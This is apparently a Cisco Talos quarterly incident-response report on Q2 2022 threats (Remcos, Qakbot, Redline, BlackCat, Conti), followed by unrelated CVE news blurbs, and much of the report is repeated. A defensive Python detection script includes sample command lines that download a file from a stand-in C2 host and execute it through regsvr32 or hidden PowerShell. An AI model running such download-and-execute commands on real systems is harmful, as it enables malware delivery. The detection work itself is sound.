Quarterly Report: Incident Response Trends in Q2 2022
Commodity malware usage surpasses ransomware by narrow margin
By Caitlin Huey.
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that, in recent weeks, has been observed in new clusters of activity delivering a variety of payloads.
Targeting
The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors.
Commodity malware
This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below.
In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code which will execute once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity using lures to entice users to open a malicious XLS file that allegedly contains confidential information.
In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: purely spoofed content using fake emails related to tax documents, and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to be primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, CTIR found that once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file whose contents included a command intended to create a directory under the user profile, contact a C2 domain (bottlenuts[.]com) to retrieve a file, and execute that file using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recently publicly reported Qakbot campaign, suggesting that this is part of the same activity.
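The two delivery chains described above (the Remcos PowerShell downloader reaching out to a bare IP address, and the Qakbot LNK-to-regsvr32 chain launched from the Downloads folder) can be turned into endpoint detection logic. The following is an added example, not CTIR or Talos code: it runs two rules over constructed Sysmon-style process-creation events, and the field names, hostnames, users and addresses are all assumed placeholders.

```python
"""Process-creation detections for the Remcos and Qakbot delivery chains.

Added example, not CTIR code. Events are assumed to carry the fields
image, parent_image, command_line, current_directory and user.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample events: hosts, users, domains and IPs are placeholders.
SAMPLE_EVENTS = [
    # Benign: an installer registering a vendor DLL from Program Files.
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',
     "current_directory": r"C:\Program Files\Vendor", "user": "CORP\\svc-install"},
    # Suspicious: a shortcut opened from Downloads creates a profile directory,
    # fetches a file from a remote host and hands it to regsvr32 (Qakbot-style).
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'cmd.exe /c mkdir %USERPROFILE%\abc && curl -o %USERPROFILE%\abc\x.dll http://c2.example.invalid/x && regsvr32.exe %USERPROFILE%\abc\x.dll',
     "current_directory": r"C:\Users\jdoe\Downloads", "user": "CORP\\jdoe"},
    # Suspicious: Excel spawns PowerShell that downloads a stage from a bare IP
    # (Remcos-style macro chain; 203.0.113.5 is a documentation address).
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r'powershell -nop -w hidden -c "Invoke-WebRequest http://203.0.113.5/s2.dat -OutFile $env:TEMP\s2.dat"',
     "current_directory": r"C:\Users\jdoe\Downloads", "user": "CORP\\jdoe"},
    # Benign: an administrator fetching a package from an internal host by name.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'powershell -c "Invoke-WebRequest https://intranet.corp.example/tools/x.zip -OutFile x.zip"',
     "current_directory": r"C:\Users\admin", "user": "CORP\\admin"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe")
USER_PROFILE_DIR = re.compile(r"(%USERPROFILE%|%APPDATA%|%TEMP%|C:\\Users\\)", re.I)
URL_RE = re.compile(r"https?://([^\s/'\"]+)", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


@dataclass
class Finding:
    rule: str
    severity: str
    user: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lnk_regsvr32_chain(ev: dict) -> Optional[Finding]:
    """A shell launched by explorer.exe from a Downloads folder whose command
    line creates a directory under the user profile, fetches something or
    makes a directory, and runs regsvr32 on a file there."""
    cl = ev["command_line"]
    if basename(ev["parent_image"]) != "explorer.exe":
        return None
    if basename(ev["image"]) not in ("cmd.exe", "powershell.exe"):
        return None
    if not ev["current_directory"].lower().endswith("\\downloads"):
        return None
    if "regsvr32" not in cl.lower() or not USER_PROFILE_DIR.search(cl):
        return None
    if not (re.search(r"\bmkdir\b|\bmd\b", cl, re.I) or URL_RE.search(cl)):
        return None
    return Finding("lnk_regsvr32_chain", "high", ev["user"], cl)


def detect_powershell_download_from_ip(ev: dict) -> Optional[Finding]:
    """PowerShell (T1059.001) whose command line references a URL with a bare
    IPv4 host; rated high when an Office application is the parent."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    hosts = [m.group(1).split(":")[0] for m in URL_RE.finditer(ev["command_line"])]
    if not any(IPV4_RE.match(h) for h in hosts):
        return None
    severity = "high" if basename(ev["parent_image"]) in OFFICE_APPS else "medium"
    return Finding("powershell_download_from_ip", severity, ev["user"], ev["command_line"])


RULES = (detect_lnk_regsvr32_chain, detect_powershell_download_from_ip)


def run_detections(events: List[dict]) -> List[Finding]:
    """Apply every rule to every event and collect the findings in order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule} user={f.user}: {f.command_line}")
```

Both benign events pass silently; the two constructed malicious chains each produce one finding.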
CTIR observed information stealers in two engagements this quarter, and in both incidents MFA was not properly applied across the organization and its third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails, adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied.
In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary authentication through MFA into the victim’s O365, Workday and Citrix VDI environments. Adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian-language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.
Ransomware
Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti.
In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”), which performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi, that have been reported leveraging the Delphi loader to run a Cobalt Strike binary.
In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).
Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. While the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta” is a suspected re-brand of Conti, based on similarities in payment and leak sites and communication styles from some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.
Initial vectors
This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.
In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPsec VPN tunnel. Analysis identified multiple failed login and brute-force attempts from various external IP addresses, highlighting the need to keep such systems updated and to limit their exposure so that unwanted traffic cannot reach the application.
Security weaknesses
The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.
In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.
Top-observed MITRE ATT&CK techniques
Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.
Key findings from the MITRE ATT&CK appendix include:
- Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter.
- In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file.
- We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications.
- Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.
| Tactic | Technique | Example |
|---|---|---|
| Initial Access (TA0001) | T1190 Exploit Public-Facing Application | Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet. |
| Reconnaissance (TA0043) | T1592 Gather Victim Host Information | Malicious file contains details about host |
| Persistence (TA0003) | T1053 Scheduled Task/Job | Scheduled tasks were created on a compromised server |
| Execution (TA0002) | T1059.001 Command and Scripting Interpreter: PowerShell | Executes PowerShell code to retrieve information about the client's Active Directory environment |
| Discovery (TA0007) | T1087 Account Discovery | Use a utility like ADRecon to enumerate information on users and groups |
| Credential Access (TA0006) | T1003.001 OS Credential Dumping: LSASS Memory | Use “lsass.exe” for stealing password hashes from memory |
| Privilege Escalation (TA0004) | T1574.002 Hijack Execution Flow: DLL Side-Loading | A malicious PowerShell script attempted to side-load a DLL into memory |
| Lateral Movement (TA0008) | T1021.001 Remote Desktop Protocol | Adversary made attempts to move laterally using Windows Remote Desktop |
| Defense Evasion (TA0005) | T1027 Obfuscated Files or Information | Use base64-encoded PowerShell scripts |
| Command and Control (TA0011) | T1219 Remote Access Software | Remote access tools found on the compromised system |
| Impact (TA0040) | T1486 Data Encrypted for Impact | Deploy Conti ransomware and encrypt critical systems |
| Exfiltration (TA0010) | T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | Actor exfiltrated data to file sharing site mega[.]nz |
| Collection (TA0009) | T1114.003 Email Collection: Email Forwarding Rule | Adversary used a compromised account to create a new inbox rule to place emails in a folder |
| Software/Tool | S0029 PsExec | Adversary made use of PsExec for lateral movement |
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that in recent weeks, has been observed in new clusters of activity delivering a variety of payloads.
Targeting
The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors.
Commodity malware
This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below.
In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code which will execute once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity using lures to entice users to open a malicious XLS file that allegedly contains confidential information.
In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, subsequently delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: Purely spoofed content using fake emails related to tax documents and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file where the contents included a command intended to create a directory under the user profile and attempt to contact a C2 domain (bottlenuts[.]com) to retrieve a file and execute it using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recent publicly reported Qakbot campaign, suggesting that this is part of the same activity.
CTIR observed several information stealers this quarter, where in both incidents, MFA was not properly applied across the organization and their third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails and adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied.
In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary MFA authentication accessing the victim’s O365, Workday and Citrix VDI environments. Adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.
**Ransomware **
Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti.
In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”) that performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike binary.
In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).
Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. As the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta’’ is a suspected re-brand of Conti, based on similarities in payment and leak sites and communication styles from some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.
Initial vectors
This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.
In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPSec VPN tunnel, a common VPN protocol used to establish a VPN connection. Analysis identified multiple failed login and brute force attempts from various external IP addresses, highlighting the need to update and limit exposure to prevent unwanted traffic from reaching the application.
**
Security weaknesses**
The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.
In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.
Top-observed MITRE ATT&CK techniques
Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.
Key findings from the MITRE ATT&CK appendix include:
- Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter.
- In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file.
- We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications.
- Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.
Related news
Red Hat uses a four-point impact scale to classify security issues affecting our products. Have you ever asked yourself what it takes and what the requirements are for each point of the scale? We will talk through the highlights of our process in this article.Is this a CVE?First and foremost, what is a CVE? Short for Common Vulnerabilities and Exposures, it is a list of publicly disclosed computer security flaws. Learn more in this Red Hat post.To receive a severity rating, the issue needs to be a CVE. But what does it take to be a CVE? In order to warrant a CVE ID, a vulnerability has to comp
Docker Desktop before 4.23.0 allows Access Token theft via a crafted extension icon URL. This issue affects Docker Desktop: before 4.23.0.
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The security vulnerabilities are as follows - CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
CISA, FBI, and South Korean intelligence agencies warn that the North Korean government is sponsoring ransomware attacks to fund its cyber-espionage activities.
SQL Injection vulnerability in Talend ESB Runtime 7.3.1-R2022-09-RT thru 8.0.1-R2022-10-RT when using the provisioning service.
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it.
Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 v2.8.0 to v2.9.1 are vulnerable to malicious code upload without authentication by using the configuration upload function. This could lead to a complete compromise of the FDS102 device.
Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter By Caitlin Huey. For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective. This quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming ...
Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, Joint cybersecurity advisory (CSA) AA22-279A, and how I analyzed these vulnerabilities using my open source project Vulristics. Alternative video link (for Russia): https://vk.com/video-149273431_456239105 Americans can’t just release a list of “20 vulnerabilities most commonly exploited in attacks on […]
Categories: Exploits and vulnerabilities Categories: News Tags: Chinese APT Tags: advanced persistent threat Tags: APT Tags: CISA Tags: NSA Tags: FBI Tags: security advisory CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China. (Read more...) The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.
A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryException and causing denial of service. Example scenarios: - Kafka cluster without authentication: Any clients able to establish a network connection to a broker can trigger the issue. - Kafka cluster with SASL authentication: Any clients able to establish a network connection to a broker, without the need for valid SASL credentials, can trigger the issue. - Kafka cluster with TLS authentication: Only clients able to successfully authenticate via TLS can trigger the issue. We advise the users to upgrade the Kafka installations to one of the 3.2.3, 3.1.2, 3.0.2, 2.8.2 versions.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked
An insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM-level command prompt.
A slew of Microsoft Exchange vulnerabilities (including ProxyLogon) fueled a surge in attacks targeting software flaws in 2021, but the trend has continued this year.
PrinterLogic Windows Client through 25.0.0.676 allows directory traversal. Authenticated users with prior knowledge of the driver filename could exploit this to escalate privileges or distribute malicious content.
A directory traversal vulnerability in the ZDBQAREFSUBDIR parameter of the /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This Metasploit module will start an LDAP server that the target will need to connect to.
Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.
Vulnerability will remain a "significant" threat for years to come and highlighted the need for more public and private sector support for open source software ecosystem, Cyber Safety Review Board says.
What are container image vulnerabilities?
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was...
In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses. The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
An infinite loop in OPC UA .NET Standard Stack 1.04.368 allows remote attackers to cause the application to hang via a crafted message.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
In Apache Archiva, any registered user can reset the password of any other user. This is fixed in Archiva 2.2.8.
Calibre-Web before 0.6.18 allows SQL injection in the user table.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow an unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
An improper input validation vulnerability in the DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path, resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may enable SMB attacks, which may result in the exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes) or, on misconfigured systems, SMB relay attacks that can lead to user impersonation on SMB shares or, in the worst case, remote code execution. This issue affects all Apache Solr versions prior to 8.11.1 and only affects Windows.
